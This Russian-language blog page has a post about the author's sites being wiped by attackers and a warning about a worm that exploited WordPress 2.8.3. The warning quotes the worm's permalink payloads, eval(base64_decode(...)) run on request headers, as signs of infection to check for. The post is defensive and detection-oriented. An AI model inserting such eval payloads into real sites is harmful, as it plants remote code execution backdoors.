Новое на сайте
- Изучаю ишимоку
- Черный список DNS серверов
- Поднять денег на форексе
- 17 шагов на пути к идеальному интернет-магазину
- Яндекс в Запорожье
- Интернет магазин
- «Адреса и организации» в Яндексе теперь для всех
- VDS manager, ISP manager
- Пульт Маулнета
artemia e-gold forex ftp gogetlinks joomla PR sape.ru seo uptime wayback machine wordpress wp-pagenavi xap.ru ТИЦ антиспам бекап бесплатный хостинг биржа ссылок браузер вирус движок сайта деньги домен заработок индексация марафет новичкам отчеты плагин платный хостинг поисковики полезные добавочки помощь раскрутка реклама сервисы ссылок серфинг создание сайта сплоги тема уязвимость хостинг юзабилити яндекс
Завалили сайты
Автор: moneyzpua
Завалили сайты, мне и моего друга.
Мой валили на протяжении нескольких дней, то одно изменят, то другое, под конец взяли и тупо вытерли содержимое сайта, около 500 Мб.
Принял для своего меры, как тут же завалили сайт друга, теперь применяю такие же меры к его сайту.
Насколько эффективные меры - покажет время.
ps
Опять спасает положение бекапы, которые я регулярно делаю.
Срочно! Уязвимость wordpress 2.8.3
Автор: moneyzpua
Месяц назад стало известно о новой в WordPress 2.8.3, позволяющей легко изменить администраторский пароль в удалённом режиме. Сразу же WordPress 2.8.4, устраняющий эту уязвимость. Как оказалось, далеко не все блогеры следят за апдейтами.
В этот уикенд разразилась нового вируса, поражающего блоги на движке WordPress 2.8.3 и более ранних версий в ветке 2.8. Червь регистрируется в блоге, запускает вредоносный код через структуру permalink и делает себя вторым админом, потом запускает скрипт для стирания себя со страницы юзеров и начинает втихую добавлять спам и ссылки на вредоносный контент в архивные топики.
Присутствие вредителя довольно сложно обнаружить сразу, тем более если он ещё ничего не опубликовал. Для этого нужно проверить фид permalinks/rss на присутствие нижеследующего кода.
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
или
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
или ошибки
‘error on line 22 at column 71: xmlParseEntityRef: no name wordpress’
Если есть такой код или фид сломан, то блог инфицирован.
Процедура удаления червя представляет собой .
Кстати, Мэтт Мюлленвег разродился на тему безопасности, в которой призывает юзеров постоянно отслеживать и устанавливать свежие апдейты, вот . Это единственный способ обезопасить себя от этой и будущих эпидемий.
Взято


